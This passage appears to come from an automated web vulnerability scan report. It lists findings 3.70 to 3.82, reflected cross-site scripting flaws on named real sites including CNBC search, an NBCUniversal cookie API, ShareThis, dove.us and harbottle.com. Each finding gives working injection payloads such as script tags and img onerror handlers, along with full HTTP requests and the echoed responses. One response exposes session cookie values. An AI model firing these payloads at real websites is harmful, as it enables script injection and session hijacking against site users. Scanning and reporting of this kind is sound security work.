The value of the pubfreq request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f82d"%3balert(1)//40cf5dbf8a was submitted in the pubfreq parameter. This input was echoed as 4f82d";alert(1)//40cf5dbf8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main.do?keywords=xss&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h4f82d"%3balert(1)//40cf5dbf8a HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:58:00 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85436
X-Aicache-OS: 64.210.194.247:80
Connection: close
Expires: Tue, 06 Sep 2011 15:08:00 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
<script>
search_GetPagination_Clientside(0,search_PagLinks,linksdisplay,keyWordParam,1,"date",formatParam,0,"h4f82d";alert(1)//40cf5dbf8a");
display_searchPageResults(0,10,1,keyWordParam);
</script>
...[SNIP]...

3.71. http://search.cnbc.com/main.do [sort parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the sort request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa5fc"%3balert(1)//d4e309e7b5c was submitted in the sort parameter. This input was echoed as aa5fc";alert(1)//d4e309e7b5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main.do?keywords=xss&sort=dateaa5fc"%3balert(1)//d4e309e7b5c&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:57 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85675
X-Aicache-OS: 64.210.194.247:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:57 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
<script>
search_GetPagination_Clientside(0,search_PagLinks,linksdisplay,keyWordParam,1,"dateaa5fc";alert(1)//d4e309e7b5c",formatParam,0,"h");
display_searchPageResults(0,10,1,keyWordParam);
</script>
...[SNIP]...

3.72. http://search.cnbc.com/main.do [sort parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the sort request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87310"><script>alert(1)</script>44b2f4d8132 was submitted in the sort parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main.do?keywords=xss&sort=date87310"><script>alert(1)</script>44b2f4d8132&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:55 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 86020
X-Aicache-OS: 64.210.194.246:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:55 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss">
<meta name=
...[SNIP]...
ut id="txtBox" name="keywords" type="text" style="width:100px" height="22px" class="search_input" onkeypress="javascript: return cnbc_searchbox_submitenter(document.getElementById('txtBox').value,'date87310"><script>alert(1)</script>44b2f4d8132',formatParam,0,'h',event);" maxlength="100"/>
...[SNIP]...

3.73. http://serve.directdigitalllc.com/serve.php [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7792f"><script>alert(1)</script>5f008c5eb4 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=7792f"><script>alert(1)</script>5f008c5eb4 HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:16:07 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9750

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
wn;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=7792f"><script>alert(1)</script>5f008c5eb4https://crm.directdigitalllc.com/click?a=76&b=26&p=76%2C17%2C104&t=11">
...[SNIP]...

3.74. http://serve.directdigitalllc.com/serve.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://serve.directdigitalllc.com
Path:   /serve.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24c33"><script>alert(1)</script>ea769a6fa16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?/24c33"><script>alert(1)</script>ea769a6fa16trg= HTTP/1.1
Host: serve.directdigitalllc.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:16:07 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 9778

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<style>
/* begin reset */
html {margin:0;padding:0;border:0;}
body, div, span, object, ifram
...[SNIP]...
known;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?/24c33"><script>alert(1)</script>ea769a6fa16trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=76%2C104%2C125&t=11">
...[SNIP]...

3.75. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 26c64<script>alert(1)</script>321541649f9 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback26c64<script>alert(1)</script>321541649f9 HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=1313446468300; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:00:57 GMT
Content-Length: 208
Content-Type: text/html

__nbcsnasadops.doSCallback26c64<script>alert(1)</script>321541649f9({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]"}});

3.76. http://wd.sharethis.com/api/getCount2.php [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e05fc%3balert(1)//177df2a42e6 was submitted in the cb parameter. This input was echoed as e05fc;alert(1)//177df2a42e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/getCount2.php?cb=stButtons.processCBe05fc%3balert(1)//177df2a42e6&url=http%3A%2F%2Fwww.tenzing.com%2Fatg-ecommerce-hosting.asp%3Futm_source%3DPG0008-ATG-Solutions%26utm_campaign%3D001%26utm_content%3D01%26utm_term%3D%252BATG%2520%252Bsolutions%26utm_medium%3DPPC HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 15:32:13 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 277

(function(){stButtons.processCBe05fc;alert(1)//177df2a42e6({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.tenzing.com\/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_
...[SNIP]...

3.77. http://www.dove.us/Products/Hair/ [ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dove.us
Path:   /Products/Hair/

Issue detail

The value of the ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41eb5"><script>alert(1)</script>fe65f901e8 was submitted in the ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=41eb5"><script>alert(1)</script>fe65f901e8 HTTP/1.1
Host: www.dove.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1
Cookie: ASP.NET_SessionId=p00w4n55ylvqfa45ehz13x45

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 29750
Date: Tue, 06 Sep 2011 16:53:45 GMT
Connection: close

<!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/> <![endif]-->
<!--[if IE 7 ]> <html l
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?app_id=165670856825683&amp;href=http://www.dove.us/Products/Hair/default.aspx?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=41eb5"><script>alert(1)</script>fe65f901e8&amp;
   send=false&amp;layout=button_count&amp;width=140&amp;show_faces=true&amp;action=recommend&amp;colorscheme=light&amp;font=arial&amp;
   height=21" title="Recommend" scrolling="no" frameborder="0"
...[SNIP]...

3.78. http://www.dove.us/Products/Hair/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dove.us
Path:   /Products/Hair/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba088"><script>alert(1)</script>d91bc007f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Products/Hair/?ba088"><script>alert(1)</script>d91bc007f7=1 HTTP/1.1
Host: www.dove.us
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 29548
Date: Tue, 06 Sep 2011 16:45:50 GMT
Connection: close

<!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/> <![endif]-->
<!--[if IE 7 ]> <html l
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?app_id=165670856825683&amp;href=http://www.dove.us/Products/Hair/default.aspx?ba088"><script>alert(1)</script>d91bc007f7=1&amp;
   send=false&amp;layout=button_count&amp;width=140&amp;show_faces=true&amp;action=recommend&amp;colorscheme=light&amp;font=arial&amp;
   height=21" title="Recommend" scrolling="no" frameborder="
...[SNIP]...

3.79. http://www.harbottle.com/hnl/pages/hnl_search2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 353c3><img%20src%3da%20onerror%3dalert(1)>9d536909165a5febf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 353c3><img src=a onerror=alert(1)>9d536909165a5febf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /hnl/pages/hnl_search2.php/353c3><img%20src%3da%20onerror%3dalert(1)>9d536909165a5febf?search=xss HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl.php?gclid=
Cache-Control: max-age=0
Origin: http://www.harbottle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:52 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5158
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/353c3><img src=a onerror=alert(1)>9d536909165a5febf.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.80. http://www.harbottle.com/hnl/pages/hnl_search2.php [search parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php

Issue detail

The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c874d"><script>alert(1)</script>742e151d0f9 was submitted in the search parameter. This input was echoed as c874d\"><script>alert(1)</script>742e151d0f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /hnl/pages/hnl_search2.php HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl.php?gclid=
Content-Length: 10
Cache-Control: max-age=0
Origin: http://www.harbottle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic

search=xssc874d"><script>alert(1)</script>742e151d0f9

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:44 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 11217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
<input type="text" name=search id="txt-search-fld" class="txt-search" value="xssc874d\"><script>alert(1)</script>742e151d0f9" />
...[SNIP]...

3.81. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 136b4><img%20src%3da%20onerror%3dalert(1)>d7f0728306f was submitted in the REST URL parameter 4. This input was echoed as 136b4><img src=a onerror=alert(1)>d7f0728306f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/136b4><img%20src%3da%20onerror%3dalert(1)>d7f0728306f?search=xss HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=7854507.756042197.1315345754.1315345754.1315345754.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345754.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:45 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5152
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/136b4><img src=a onerror=alert(1)>d7f0728306f.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.82. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70e82<img%20src%3da%20onerror%3dalert(1)>070b3549546 was submitted in the REST URL parameter 4. This input was echoed as 70e82<img src=a onerror=alert(1)>070b3549546 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf70e82<img%20src%3da%20onerror%3dalert(1)>070b3549546?search=xss HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=7854507.756042197.1315345754.1315345754.1315345754.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345754.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:49 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5219
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
